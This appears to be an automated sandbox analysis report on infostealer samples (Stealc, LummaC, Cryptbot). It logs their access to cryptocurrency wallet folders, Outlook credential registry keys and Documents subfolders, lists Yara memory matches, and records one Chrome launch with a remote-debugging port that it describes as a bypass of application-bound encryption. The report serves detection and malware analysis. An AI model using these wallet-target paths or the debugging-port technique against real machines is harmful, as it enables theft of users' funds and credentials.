Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC

Source: Yara match	File source: 00000016.00000003.2179626539.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2178551936.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2783203653.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2743575261.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2637900652.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2592686398.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"

Yara detected Cryptbot

Source: Yara match	File source: 00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Offnewhere.exe PID: 7260, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 17.0.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
